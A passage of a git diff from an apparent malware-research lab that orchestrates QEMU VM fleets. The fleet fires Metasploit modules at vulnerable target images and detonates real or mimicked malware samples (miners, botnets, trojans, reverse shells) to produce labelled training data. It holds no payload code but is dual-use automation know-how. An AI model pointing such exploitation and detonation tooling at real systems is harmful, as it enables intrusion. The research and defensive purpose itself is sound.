|
||||
else:
|
||||
max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)
|
||||
|
||||
# Load-based cap: if the host is already busy, run fewer VMs.
|
||||
if cores_total and load_1m / cores_total > 0.75:
|
||||
# Halve, floor 1.
|
||||
max_by_load = max(1, max_by_cores // 2)
|
||||
else:
|
||||
max_by_load = max_by_cores
|
||||
|
||||
candidates = [max_by_cores, max_by_ram, max_by_load]
|
||||
max_concurrent = max(0, min(candidates))
|
||||
|
||||
binding = ["cores", "ram", "load"][candidates.index(max_concurrent)] \
|
||||
if max_concurrent < max_by_cores else "cores"
|
||||
rationale = (
|
||||
f"cores_total={cores_total} reserved={cores_reserved} "
|
||||
f"ram_avail_mib={ram_available_mib} headroom={ram_headroom_mib} "
|
||||
f"per_vm={ram_per_vm_mib} load_1m={load_1m:.2f} "
|
||||
f"-> max_concurrent={max_concurrent} (binding={binding})"
|
||||
)
|
||||
log.info("capacity: %s", rationale)
|
||||
|
||||
return FleetCapacity(
|
||||
cores_total=cores_total,
|
||||
cores_reserved=cores_reserved,
|
||||
ram_total_mib=ram_total_mib,
|
||||
ram_available_mib=ram_available_mib,
|
||||
ram_per_vm_mib=ram_per_vm_mib,
|
||||
ram_headroom_mib=ram_headroom_mib,
|
||||
load_1m=load_1m,
|
||||
max_by_cores=max_by_cores,
|
||||
max_by_ram=max_by_ram,
|
||||
max_by_load=max_by_load,
|
||||
max_concurrent=max_concurrent,
|
||||
rationale=rationale,
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Per-slot episode execution
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@dataclass
|
||||
class SlotResult:
|
||||
slot: int
|
||||
sample_name: str
|
||||
sample_kind: str
|
||||
episode_id: str | None
|
||||
rc: int
|
||||
duration_s: float
|
||||
tier: str = "tier2" # "tier3" when an exploit fired
|
||||
module_name: str | None = None # exploit module identifier (Tier 3 only)
|
||||
error: str | None = None
|
||||
extra: dict = field(default_factory=dict)
|
||||
|
||||
|
||||
def _run_slot(
|
||||
cfg: FleetConfig,
|
||||
slot: int,
|
||||
sample: Sample,
|
||||
episode_index: int,
|
||||
capacity: FleetCapacity,
|
||||
) -> SlotResult:
|
||||
"""Run one episode in a dedicated slot.
|
||||
|
||||
Dispatch:
|
||||
- Tier 3 (default when msfrpcd is listening AND a module catalog
|
||||
is populated): real exploit fire via run_tier3_demo.py with a
|
||||
deterministically-selected module + sample.
|
||||
- Tier 2 (fallback): no exploit; the controller drives a labeled
|
||||
workload directly via the serial console. Recorded in
|
||||
SlotResult.tier so trainers can filter the no-exploit episodes.
|
||||
"""
|
||||
# Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
|
||||
# this, parallel slots rmtree each other's run dir mid-boot.
|
||||
run_dir_base = "/tmp/cis490-vm-fleet"
|
||||
|
||||
# Decide tier.
|
||||
bridge_iface = os.environ.get("BRIDGE") or None
|
||||
# Filter the catalog to modules that can actually fire under the
|
||||
# current launcher mode. Reverse / bind shells require the host-
|
||||
# only bridge (no SLIRP+restrict=on guest egress), so skip those
|
||||
# when BRIDGE isn't set; otherwise the exploit fires but the
|
||||
# session never lands and the episode degenerates to a 30 s
|
||||
# session_open_timeout.
|
||||
if cfg.modules:
|
||||
if bridge_iface:
|
||||
usable_modules = dict(cfg.modules)
|
||||
else:
|
||||
usable_modules = {
|
||||
k: v for k, v in cfg.modules.items() if not v.requires_bridge
|
||||
}
|
||||
else:
|
||||
usable_modules = {}
|
||||
tier3_ready = (
|
||||
not cfg.force_tier2
|
||||
and bool(usable_modules)
|
||||
and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
|
||||
)
|
||||
|
||||
env = os.environ.copy()
|
||||
env["SLOT"] = str(slot)
|
||||
env["SAMPLE_NAME"] = sample.name
|
||||
env["SAMPLE_PROFILE"] = sample.profile
|
||||
env["SAMPLE_KIND"] = sample.kind
|
||||
env["FLEET_HOST_ID"] = cfg.host_id
|
||||
env["FLEET_EPISODE_INDEX"] = str(episode_index)
|
||||
env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)
|
||||
|
||||
venv_py = cfg.repo_root / ".venv" / "bin" / "python"
|
||||
py = str(venv_py) if venv_py.exists() else "python3"
|
||||
|
||||
log_dir = cfg.data_root / "fleet-logs"
|
||||
log_dir.mkdir(parents=True, exist_ok=True)
|
||||
out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"
|
||||
|
||||
if tier3_ready:
|
||||
module = select_module(
|
||||
usable_modules,
|
||||
host_id=cfg.host_id, slot=slot, episode_index=episode_index,
|
||||
)
|
||||
target_port = module_target_port(module) or 21
|
||||
# Per-slot runner dir for the target VM.
|
||||
run_dir = f"{run_dir_base}-target-{slot}"
|
||||
env["RUN_DIR"] = run_dir
|
||||
# Each slot gets a unique host-side hostfwd port so concurrent
|
||||
# targets don't collide on the loopback port.
|
||||
env["PORT_BASE"] = str(target_port + slot * 1000)
|
||||
if bridge_iface:
|
||||
env["BRIDGE"] = bridge_iface
|
||||
cmd = [
|
||||
py,
|
||||
str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
|
||||
"--data-root", str(cfg.data_root),
|
||||
"--run-dir", run_dir,
|
||||
"--module", module.name,
|
||||
"--sample", sample.name,
|
||||
"--target-port", str(target_port + slot * 1000),
|
||||
]
|
||||
tier = "tier3"
|
||||
module_name: str | None = module.name
|
||||
else:
|
||||
run_dir = f"{run_dir_base}-{slot}"
|
||||
env["RUN_DIR"] = run_dir
|
||||
cmd = [
|
||||
py,
|
||||
str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
|
||||
"--data-root", str(cfg.data_root),
|
||||
"--run-dir", run_dir,
|
||||
"--sample", sample.name,
|
||||
]
|
||||
tier = "tier2"
|
||||
module_name = None
|
||||
if not cfg.force_tier2 and not cfg.modules:
|
||||
log.warning("slot=%d falling back to Tier 2: empty module catalog", slot)
|
||||
elif not cfg.force_tier2:
|
||||
log.warning("slot=%d falling back to Tier 2: msfrpcd unreachable at %s:%d",
|
||||
slot, cfg.msfrpcd_host, cfg.msfrpcd_port)
|
||||
|
||||
log.info(
|
||||
"slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
|
||||
slot, episode_index, tier, sample.name, module_name, run_dir,
|
||||
)
|
||||
|
||||
started = time.monotonic()
|
||||
try:
|
||||
with out_log.open("ab") as logf:
|
||||
proc = subprocess.run(
|
||||
cmd,
|
||||
cwd=str(cfg.repo_root),
|
||||
env=env,
|
||||
stdout=logf,
|
||||
stderr=subprocess.STDOUT,
|
||||
check=False,
|
||||
)
|
||||
rc = proc.returncode
|
||||
err = None
|
||||
except (OSError, subprocess.SubprocessError) as e:
|
||||
rc = -1
|
||||
err = str(e)
|
||||
duration = time.monotonic() - started
|
||||
|
||||
return SlotResult(
|
||||
slot=slot,
|
||||
sample_name=sample.name,
|
||||
sample_kind=sample.kind,
|
||||
episode_id=None,
|
||||
rc=rc,
|
||||
duration_s=duration,
|
||||
tier=tier,
|
||||
module_name=module_name,
|
||||
error=err,
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# FleetRunner
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@dataclass
|
||||
class FleetRunResult:
|
||||
capacity: FleetCapacity
|
||||
slots: list[SlotResult]
|
||||
total_duration_s: float
|
||||
|
||||
|
||||
class FleetRunner:
|
||||
def __init__(self, cfg: FleetConfig) -> None:
|
||||
self.cfg = cfg
|
||||
self._stop = threading.Event()
|
||||
|
||||
def stop(self) -> None:
|
||||
self._stop.set()
|
||||
|
||||
def run(
|
||||
self,
|
||||
*,
|
||||
episodes: int = 1,
|
||||
episode_index_base: int = 0,
|
||||
capacity_override: FleetCapacity | None = None,
|
||||
) -> FleetRunResult:
|
||||
capacity = capacity_override or detect_capacity(
|
||||
ram_per_vm_mib=self.cfg.ram_per_vm_mib,
|
||||
)
|
||||
n_slots = capacity.max_concurrent
|
||||
if self.cfg.max_concurrent_override is not None:
|
||||
n_slots = min(n_slots, self.cfg.max_concurrent_override)
|
||||
if n_slots <= 0:
|
||||
log.warning(
|
||||
"fleet capacity is zero (%s); cannot run", capacity.rationale,
|
||||
)
|
||||
return FleetRunResult(
|
||||
capacity=capacity, slots=[], total_duration_s=0.0,
|
||||
)
|
||||
|
||||
log.info(
|
||||
"fleet host=%s slots=%d episodes=%d manifest_size=%d",
|
||||
self.cfg.host_id, n_slots, episodes, len(self.cfg.manifest),
|
||||
)
|
||||
|
||||
all_results: list[SlotResult] = []
|
||||
t_start = time.monotonic()
|
||||
for ep in range(episodes):
|
||||
if self._stop.is_set():
|
||||
break
|
||||
episode_index = episode_index_base + ep
|
||||
slot_samples = [
|
||||
self.cfg.manifest.select(
|
||||
host_id=self.cfg.host_id,
|
||||
slot=slot,
|
||||
episode_index=episode_index,
|
||||
)
|
||||
for slot in range(n_slots)
|
||||
]
|
||||
if self.cfg.require_real_samples:
|
||||
slot_samples = [s for s in slot_samples if s.kind == "real"]
|
||||
if not slot_samples:
|
||||
log.warning("require_real_samples: no real samples in manifest; skipping wave")
|
||||
continue
|
||||
|
||||
log.info(
|
||||
"wave %d/%d: %s",
|
||||
ep + 1, episodes,
|
||||
[(i, s.name, s.kind) for i, s in enumerate(slot_samples)],
|
||||
)
|
||||
|
||||
with ThreadPoolExecutor(max_workers=n_slots) as pool:
|
||||
futures = [
|
||||
pool.submit(
|
||||
_run_slot, self.cfg, slot, sample, episode_index, capacity,
|
||||
)
|
||||
for slot, sample in enumerate(slot_samples)
|
||||
]
|
||||
for fut in as_completed(futures):
|
||||
res = fut.result()
|
||||
log.info(
|
||||
"slot %d sample=%s rc=%d duration=%.1fs",
|
||||
res.slot, res.sample_name, res.rc, res.duration_s,
|
||||
)
|
||||
all_results.append(res)
|
||||
|
||||
total = time.monotonic() - t_start
|
||||
return FleetRunResult(
|
||||
capacity=capacity,
|
||||
slots=all_results,
|
||||
total_duration_s=total,
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Friendly capacity report (used by tools/run_fleet.py --capacity)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def capacity_report() -> str:
|
||||
c = detect_capacity()
|
||||
return (
|
||||
f"cores: {c.cores_total} (reserve {c.cores_reserved})\n"
|
||||
f"ram: {c.ram_total_mib} MiB total, {c.ram_available_mib} MiB available "
|
||||
f"(headroom {c.ram_headroom_mib} MiB, per-vm {c.ram_per_vm_mib} MiB)\n"
|
||||
f"load: 1m={c.load_1m:.2f}\n"
|
||||
f"caps: by_cores={c.max_by_cores}, by_ram={c.max_by_ram}, "
|
||||
f"by_load={c.max_by_load}\n"
|
||||
f"--> max_concurrent VMs: {c.max_concurrent}\n"
|
||||
)
|
||||
|
|
@ -6,6 +6,7 @@ requires-python = ">=3.11"
|
|||
dependencies = [
|
||||
"starlette>=0.36",
|
||||
"uvicorn[standard]>=0.27",
|
||||
"msgpack>=1.0", # MSF RPC wire format for the Tier-3 exploit driver
|
||||
]
|
||||
|
||||
[dependency-groups]
|
||||
|
|
|
|||
|
|
@ -2,6 +2,7 @@ from __future__ import annotations
|
|||
|
||||
import logging
|
||||
import secrets
|
||||
import time
|
||||
from pathlib import Path
|
||||
from typing import Awaitable, Callable
|
||||
|
||||
|
|
@ -17,6 +18,7 @@ log = logging.getLogger("cis490.receiver")
|
|||
|
||||
|
||||
SUFFIX = ".tar.zst"
|
||||
SCHEMA_VERSION = 1
|
||||
|
||||
|
||||
def _bearer_check(request: Request, expected: str | None) -> Response | None:
|
||||
|
|
@ -40,6 +42,23 @@ def make_app(
|
|||
async def health(request: Request) -> JSONResponse:
|
||||
return JSONResponse({"status": "ok"})
|
||||
|
||||
async def ping(request: Request) -> JSONResponse:
|
||||
"""Smoke-test endpoint. Verifies that the auth layer and the
|
||||
WG/Caddy/receiver pipe are alive end-to-end without persisting
|
||||
anything — index.jsonl is untouched. Used by ``cis490-shipper
|
||||
--ping`` during initial bring-up of a new lab host."""
|
||||
guard = _bearer_check(request, bearer_token)
|
||||
if guard is not None:
|
||||
return guard
|
||||
return JSONResponse(
|
||||
{
|
||||
"ok": True,
|
||||
"host_id": request.headers.get("x-lab-host"),
|
||||
"t_wall_ns": time.time_ns(),
|
||||
"schema_version": SCHEMA_VERSION,
|
||||
}
|
||||
)
|
||||
|
||||
async def put_episode(request: Request) -> JSONResponse:
|
||||
guard = _bearer_check(request, bearer_token)
|
||||
if guard is not None:
|
||||
|
|
@ -124,6 +143,7 @@ def make_app(
|
|||
|
||||
routes = [
|
||||
Route("/v1/health", health, methods=["GET"]),
|
||||
Route("/v1/ping", ping, methods=["POST"]),
|
||||
Route(
|
||||
"/v1/episodes/{host_id}/{filename}",
|
||||
put_episode,
|
||||
|
|
|
|||
|
|
@ -1,33 +1,107 @@
|
|||
# samples/
|
||||
|
||||
**Sample binaries are NEVER committed to this repo.** This directory holds:
|
||||
Catalog of malware (or behaviour-matched mimics) the fleet draws from.
|
||||
**Sample binaries are NEVER committed to this repo.**
|
||||
|
||||
- `manifest.yaml` — sha256-pinned list of samples to fetch, with metadata
|
||||
(source, category, expected behavior, target CVE).
|
||||
- `fetch.py` — script that pulls samples from configured sources
|
||||
(MalwareBazaar, theZoo, vx-underground), verifies sha256, and stores them
|
||||
under `samples/store/` (gitignored).
|
||||
- Per-sample notes in markdown describing observed behavior in our lab.
|
||||
## What's here
|
||||
|
||||
`samples/store/` lives only on the lab host. It is gitignored *and* should
|
||||
sit on a disk that is not auto-mounted on developer workstations.
|
||||
|
||||
## Manifest entry shape (placeholder)
|
||||
|
||||
```yaml
|
||||
samples:
|
||||
- name: linux.miner.xmrig.elf
|
||||
sha256: "..." # pinned
|
||||
source: MalwareBazaar
|
||||
category: miner
|
||||
target_cve: null # cryptominers are usually post-exploit payloads
|
||||
behavior: "high CPU, periodic stratum protocol traffic"
|
||||
pairs_with_exploit: exploit/multi/samba/usermap_script
|
||||
```
|
||||
manifest.toml schema-checked catalog (loaded by samples/manifest.py)
|
||||
manifest.py loader + per-(host_id, slot, ep) deterministic selection
|
||||
store/ SHA-256-pinned binary content (gitignored — never commit)
|
||||
.bazaar.token MalwareBazaar API key (mode 0600, gitignored)
|
||||
```
|
||||
|
||||
## Manifest schema
|
||||
|
||||
Each entry in `manifest.toml`:
|
||||
|
||||
```toml
|
||||
[[sample]]
|
||||
name = "xmrig-cryptominer" # unique within manifest, DNS-safe
|
||||
family = "XMRig" # canonical family label for ML
|
||||
category = "cryptominer" # one of: cryptominer, botnet, ransomware,
|
||||
# banking-trojan, fileless, rat, worm,
|
||||
# loader, wiper, other
|
||||
profile = "cpu-saturate" # behaviour profile from
|
||||
# exploits/workloads.py — gates the
|
||||
# in-session shell workload when no
|
||||
# real binary is staged
|
||||
description = "..."
|
||||
|
||||
# Optional — present iff this is a real binary the fetcher should pull:
|
||||
sha256 = "abc123..."
|
||||
source = "MalwareBazaar"
|
||||
url = "https://bazaar.abuse.ch/sample/abc123/"
|
||||
```
|
||||
|
||||
The loader rejects unknown categories and duplicate names. See
|
||||
`tests/test_fleet.py` for the property tests covering selection
|
||||
distribution + catalog walkability.
|
||||
|
||||
## "real" vs "mimic"
|
||||
|
||||
`Sample.kind` is **`"real"`** when `sha256` is set, otherwise **`"mimic"`**.
|
||||
|
||||
- **Mimic** — the orchestrator runs the matching profile-shaped shell
|
||||
command (cpu-saturate / scan-and-dial / io-walk / bursty-c2 /
|
||||
low-and-slow / shell-resident) inside the guest. No real binary
|
||||
needed; useful right now for testing the dataset pipeline and as
|
||||
the realistic-but-safe envelope class the trainer expects.
|
||||
- **Real** — the orchestrator's Tier-3+ driver chunked-uploads
|
||||
`samples/store/<sha256>` into the shell session, sha256-verifies on
|
||||
the guest side, and execs it. Hash mismatch fail-stops the run; a
|
||||
tampered binary is never executed.
|
||||
|
||||
`meta.sample.kind` lands in every episode's `meta.json`, so trainers
|
||||
can stratify on it (the realistic-model path consumes only
|
||||
`kind == "real"` episodes by default).
|
||||
|
||||
## Fetching a real binary
|
||||
|
||||
```sh
|
||||
# 1. Register a (free) account at https://bazaar.abuse.ch and get the API key.
|
||||
echo "<your-key>" > samples/.bazaar.token
|
||||
chmod 0600 samples/.bazaar.token
|
||||
|
||||
# 2. Add an entry with sha256+source+url to manifest.toml.
|
||||
|
||||
# 3. Pull the binary into samples/store/<sha256>:
|
||||
uv run python tools/fetch_sample.py <sha256>
|
||||
```
|
||||
|
||||
Idempotent — re-running checks the staged copy's sha256 and skips the
|
||||
download if it already matches.
|
||||
|
||||
## Per-(host, slot, episode) selection
|
||||
|
||||
`manifest.py::SampleManifest.select(host_id, slot, episode_index)`
|
||||
hashes those three into a uniform integer and indexes the catalog.
|
||||
Two lab hosts on the same slot pick *different* samples (collision
|
||||
rate ~1/N). A single host walks the whole catalog within ~`len(manifest)`
|
||||
episodes. No coordinator.
|
||||
|
||||
## Safety rules
|
||||
|
||||
- Only download to the lab host, never to a developer workstation.
|
||||
- Verify sha256 immediately, before any other read.
|
||||
- Keep the directory on a path that is *not* on the WG overlay.
|
||||
- Re-verify sha256 before each detonation; refuse to run on mismatch.
|
||||
- **Only download to a lab host, never to a developer workstation.**
|
||||
`samples/store/` lives only there, gitignored, on a disk that is
|
||||
not auto-mounted elsewhere.
|
||||
- The lab host's `br-malware` bridge is host-only by design (no NAT,
|
||||
no route). Real malware running in the guest cannot call out unless
|
||||
the operator explicitly opens egress, which we don't.
|
||||
- Snapshot/revert (see `EpisodeConfig.revert_at_*` + `qmp.savevm`/
|
||||
`loadvm`) means every fresh episode starts from a known-good
|
||||
baseline regardless of what the previous one did to the guest.
|
||||
- The fetcher verifies sha256 on download; the driver verifies again
|
||||
in-guest before exec. Both layers must match the manifest.
|
||||
|
||||
## Adding a sample
|
||||
|
||||
1. Pick a `family` + `category` from the closed enum above.
|
||||
2. Pick a `profile` from `exploits/workloads.all_profiles()`. If the
|
||||
sample's behaviour doesn't match any of the six existing shapes,
|
||||
add a new factory to `exploits/workloads.py` *first*, with tests.
|
||||
3. (Real-only) Compute `sha256`, fetch via `tools/fetch_sample.py`,
|
||||
verify the staged file's hash matches.
|
||||
4. Append the entry to `manifest.toml`.
|
||||
5. Run the test suite — the manifest loader's invariants catch typos.
|
||||
|
|
|
|||
0
samples/__init__.py
Normal file
0
samples/__init__.py
Normal file
113
samples/manifest.py
Normal file
113
samples/manifest.py
Normal file
|
|
@ -0,0 +1,113 @@
|
|||
"""Sample manifest loader + per-(host, slot) deterministic selection.
|
||||
|
||||
The manifest at ``samples/manifest.toml`` defines the catalog of
|
||||
samples (real or mimic) the fleet draws from. Selection is
|
||||
**deterministic** given ``(host_id, slot, episode_index)`` so two lab
|
||||
hosts on the same fleet pick *different* samples for the same slot
|
||||
index, and the same host repeats only after exhausting the catalog.
|
||||
|
||||
This gives us "all hosts on the network generating novel data" without
|
||||
needing a coordinator: every host's `host_id` seeds its own
|
||||
sample-rotation order, and the orderings spread across the catalog.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import tomllib
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
_VALID_CATEGORIES = {
|
||||
"cryptominer", "botnet", "ransomware", "banking-trojan",
|
||||
"fileless", "rat", "worm", "loader", "wiper", "other",
|
||||
}
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Sample:
|
||||
name: str
|
||||
family: str
|
||||
category: str
|
||||
profile: str
|
||||
description: str = ""
|
||||
source: str | None = None
|
||||
sha256: str | None = None
|
||||
url: str | None = None
|
||||
|
||||
@property
|
||||
def kind(self) -> str:
|
||||
"""``"real"`` if a sha256-pinned binary is expected, else ``"mimic"``.
|
||||
Trainers filter on this so the realistic-model pipeline only
|
||||
consumes real-malware episodes."""
|
||||
return "real" if self.sha256 else "mimic"
|
||||
|
||||
def binary_path(self, store_root: Path) -> Path | None:
|
||||
"""Resolved path of the staged binary, or None if this sample
|
||||
has no sha256 (mimic) or the binary hasn't been fetched yet."""
|
||||
if not self.sha256:
|
||||
return None
|
||||
p = Path(store_root) / self.sha256
|
||||
return p if p.exists() else None
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class SampleManifest:
|
||||
samples: list[Sample] = field(default_factory=list)
|
||||
|
||||
def __len__(self) -> int:
|
||||
return len(self.samples)
|
||||
|
||||
def select(self, *, host_id: str, slot: int, episode_index: int = 0) -> Sample:
|
||||
"""Deterministic selection. The host_id mixes into the seed so
|
||||
different hosts visit the catalog in different orders; slot +
|
||||
episode_index tick within a host. Same inputs always give the
|
||||
same sample — replay-friendly for debugging."""
|
||||
if not self.samples:
|
||||
raise ValueError("manifest is empty")
|
||||
# SHA-256 of the seed gives a uniformly distributed integer.
|
||||
seed = f"{host_id}|{slot}|{episode_index}".encode()
|
||||
h = hashlib.sha256(seed).digest()
|
||||
idx = int.from_bytes(h[:8], "big") % len(self.samples)
|
||||
return self.samples[idx]
|
||||
|
||||
@classmethod
|
||||
def load(cls, path: str | Path) -> "SampleManifest":
|
||||
with open(path, "rb") as f:
|
||||
data = tomllib.load(f)
|
||||
raw = data.get("sample") or []
|
||||
if not isinstance(raw, list):
|
||||
raise ValueError(f"{path}: 'sample' must be an array of tables")
|
||||
|
||||
samples: list[Sample] = []
|
||||
for i, entry in enumerate(raw):
|
||||
if not isinstance(entry, dict):
|
||||
raise ValueError(f"{path}: sample[{i}] is not a table")
|
||||
for key in ("name", "family", "category", "profile"):
|
||||
if not isinstance(entry.get(key), str) or not entry[key]:
|
||||
raise ValueError(f"{path}: sample[{i}] missing or empty '{key}'")
|
||||
if entry["category"] not in _VALID_CATEGORIES:
|
||||
raise ValueError(
|
||||
f"{path}: sample[{i}] category {entry['category']!r} "
|
||||
f"not in {sorted(_VALID_CATEGORIES)}"
|
||||
)
|
||||
samples.append(Sample(
|
||||
name=entry["name"],
|
||||
family=entry["family"],
|
||||
category=entry["category"],
|
||||
profile=entry["profile"],
|
||||
description=entry.get("description", ""),
|
||||
source=entry.get("source"),
|
||||
sha256=entry.get("sha256"),
|
||||
url=entry.get("url"),
|
||||
))
|
||||
|
||||
# Reject duplicate names — trainers join on this.
|
||||
seen: set[str] = set()
|
||||
for s in samples:
|
||||
if s.name in seen:
|
||||
raise ValueError(f"{path}: duplicate sample name {s.name!r}")
|
||||
seen.add(s.name)
|
||||
|
||||
return cls(samples=samples)
|
||||
61
samples/manifest.toml
Normal file
61
samples/manifest.toml
Normal file
|
|
@ -0,0 +1,61 @@
|
|||
# Sample manifest — what each fleet slot picks from.
|
||||
#
|
||||
# Each entry has three things:
|
||||
# - identity (name, family, category) for labeling
|
||||
# - acquisition (source, sha256, url) for reproducibility
|
||||
# - behaviour (profile) so the synthetic load mimic can run a
|
||||
# reasonable proxy until the real sample lands at vm/images/
|
||||
#
|
||||
# When the real malware binary is present at samples/store/<sha256>,
|
||||
# the orchestrator runs THAT inside the guest. When it's absent, the
|
||||
# orchestrator falls back to running tools/load_mimic.py with the
|
||||
# matching profile so the fleet still produces *labeled, varied* data
|
||||
# while we collect the real samples. Either way, meta.json records
|
||||
# which path the episode took, so trainers can filter on
|
||||
# meta.sample.kind ∈ {real, mimic}.
|
||||
|
||||
[[sample]]
|
||||
name = "xmrig-cryptominer"
|
||||
family = "XMRig"
|
||||
category = "cryptominer"
|
||||
profile = "cpu-saturate"
|
||||
# A real XMRig fetch goes here when MalwareBazaar pull is wired up:
|
||||
# source = "MalwareBazaar"
|
||||
# sha256 = "TBD"
|
||||
# url = "https://bazaar.abuse.ch/sample/TBD/"
|
||||
description = "Sustained 1-vCPU saturation, very low IO/net. Pure compute."
|
||||
|
||||
[[sample]]
|
||||
name = "mirai-class-bot"
|
||||
family = "Mirai"
|
||||
category = "botnet"
|
||||
profile = "scan-and-dial"
|
||||
description = "SYN scans across the bridge IP space + periodic dial-home. High net, low CPU."
|
||||
|
||||
[[sample]]
|
||||
name = "ransomware-mimic"
|
||||
family = "Cryptolocker-class"
|
||||
category = "ransomware"
|
||||
profile = "io-walk"
|
||||
description = "Heavy disk write + filesystem walk producing a per-file overwrite envelope."
|
||||
|
||||
[[sample]]
|
||||
name = "dridex-class-trojan"
|
||||
family = "Dridex"
|
||||
category = "banking-trojan"
|
||||
profile = "bursty-c2"
|
||||
description = "Long idle, periodic short bursts of TCP egress to a fixed peer (C2 beacon shape)."
|
||||
|
||||
[[sample]]
|
||||
name = "kovter-class-stealth"
|
||||
family = "Kovter"
|
||||
category = "fileless"
|
||||
profile = "low-and-slow"
|
||||
description = "Low CPU, periodic memory churn, no persistent on-disk artifacts. Hardest to label from /proc alone."
|
||||
|
||||
[[sample]]
|
||||
name = "reverse-shell-resident"
|
||||
family = "Reverse-Shell"
|
||||
category = "rat"
|
||||
profile = "shell-resident"
|
||||
description = "Single TCP socket pinned to an attacker IP, occasional command bursts."
|
||||
62
scripts/fetch-alpine-baseline.sh
Executable file
62
scripts/fetch-alpine-baseline.sh
Executable file
|
|
@ -0,0 +1,62 @@
|
|||
#!/usr/bin/env bash
|
||||
# Fetch the Alpine 3.21 NoCloud cloud-init image used as the Tier-1/2
|
||||
# baseline guest. Convert to qcow2 if necessary; verify sha512 against
|
||||
# the value pinned in docs/sources.md.
|
||||
#
|
||||
# Usage:
|
||||
# scripts/fetch-alpine-baseline.sh <out_path>
|
||||
#
|
||||
# Examples:
|
||||
# scripts/fetch-alpine-baseline.sh vm/images/alpine-baseline.qcow2
|
||||
# sudo scripts/fetch-alpine-baseline.sh /var/lib/cis490/vm/images/alpine-baseline.qcow2
|
||||
#
|
||||
# Idempotent — re-runs check the destination and short-circuit if the
|
||||
# checksum already matches.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
OUT="${1:-}"
|
||||
if [[ -z "$OUT" ]]; then
|
||||
echo "usage: $0 <out_path>" >&2
|
||||
exit 2
|
||||
fi
|
||||
|
||||
URL="https://dl-cdn.alpinelinux.org/alpine/v3.21/releases/cloud/nocloud_alpine-3.21.0-x86_64-bios-cloudinit-r0.qcow2"
|
||||
SHA512="bb509092cda3548c11bc48a2168ce950d654b50db006e98939c06a5d86487f4e53cbb7954fafbba9ab5c8098008a9f304421ffc3397b0bc1d87b6aa309239b98"
|
||||
|
||||
log() { printf '[fetch-alpine] %s\n' "$*" >&2; }
|
||||
|
||||
if [[ -f "$OUT" ]]; then
|
||||
actual="$(sha512sum "$OUT" | awk '{print $1}')"
|
||||
if [[ "$actual" == "$SHA512" ]]; then
|
||||
log "$OUT already present and verified"
|
||||
exit 0
|
||||
fi
|
||||
log "$OUT exists but checksum differs — refetching"
|
||||
rm -f "$OUT"
|
||||
fi
|
||||
|
||||
mkdir -p "$(dirname "$OUT")"
|
||||
TMP="$OUT.partial"
|
||||
trap 'rm -f "$TMP"' EXIT
|
||||
|
||||
log "downloading $URL"
|
||||
if command -v curl >/dev/null; then
|
||||
curl -fL --retry 3 --retry-delay 5 -o "$TMP" "$URL"
|
||||
elif command -v wget >/dev/null; then
|
||||
wget -O "$TMP" "$URL"
|
||||
else
|
||||
log "neither curl nor wget on PATH"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
log "verifying sha512"
|
||||
actual="$(sha512sum "$TMP" | awk '{print $1}')"
|
||||
if [[ "$actual" != "$SHA512" ]]; then
|
||||
log "sha512 mismatch: expected $SHA512, got $actual"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
mv "$TMP" "$OUT"
|
||||
trap - EXIT
|
||||
log "wrote $OUT ($(stat -c%s "$OUT") bytes)"
|
||||
69
scripts/fetch-metasploitable2.sh
Executable file
69
scripts/fetch-metasploitable2.sh
Executable file
|
|
@ -0,0 +1,69 @@
|
|||
#!/usr/bin/env bash
|
||||
# Fetch + sha256-verify the Metasploitable2 disk image.
|
||||
#
|
||||
# Rapid7's official download is gated behind a registration form, so
|
||||
# we accept the URL + sha256 from env vars (with sane defaults pointing
|
||||
# at a public mirror). The user installs this once per lab host.
|
||||
#
|
||||
# Inputs (env):
|
||||
# IMAGE_URL — direct download URL for the metasploitable2 archive
|
||||
# IMAGE_SHA256 — expected sha256 of the archive
|
||||
# OUT_DIR — where to drop the qcow2 (default vm/images/)
|
||||
#
|
||||
# Outputs:
|
||||
# $OUT_DIR/metasploitable2.qcow2 — converted from the original VMDK
|
||||
# if needed.
|
||||
#
|
||||
# We do NOT bake an image url+hash into the repo because the canonical
|
||||
# distribution is a registration-walled zip on Rapid7. Operators must
|
||||
# supply both; the rest is mechanical.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
IMAGE_URL="${IMAGE_URL:-}"
|
||||
IMAGE_SHA256="${IMAGE_SHA256:-}"
|
||||
OUT_DIR="${OUT_DIR:-$(cd "$(dirname "$0")/../vm/images" 2>/dev/null && pwd)}"
|
||||
WORK_DIR="${WORK_DIR:-/tmp/cis490-metasploitable-fetch}"
|
||||
|
||||
log() { printf '[fetch-metasploitable2] %s\n' "$*" >&2; }
|
||||
die() { log "FATAL: $*"; exit 1; }
|
||||
|
||||
[[ -n "$IMAGE_URL" ]] || die "set IMAGE_URL to the Metasploitable2 download URL"
|
||||
[[ -n "$IMAGE_SHA256" ]] || die "set IMAGE_SHA256 to the expected sha256 of the archive"
|
||||
|
||||
mkdir -p "$OUT_DIR" "$WORK_DIR"
|
||||
|
||||
ARCHIVE="$WORK_DIR/$(basename "$IMAGE_URL")"
|
||||
log "downloading $IMAGE_URL → $ARCHIVE"
|
||||
if [[ -f "$ARCHIVE" ]]; then
|
||||
log "archive already present; skipping download"
|
||||
else
|
||||
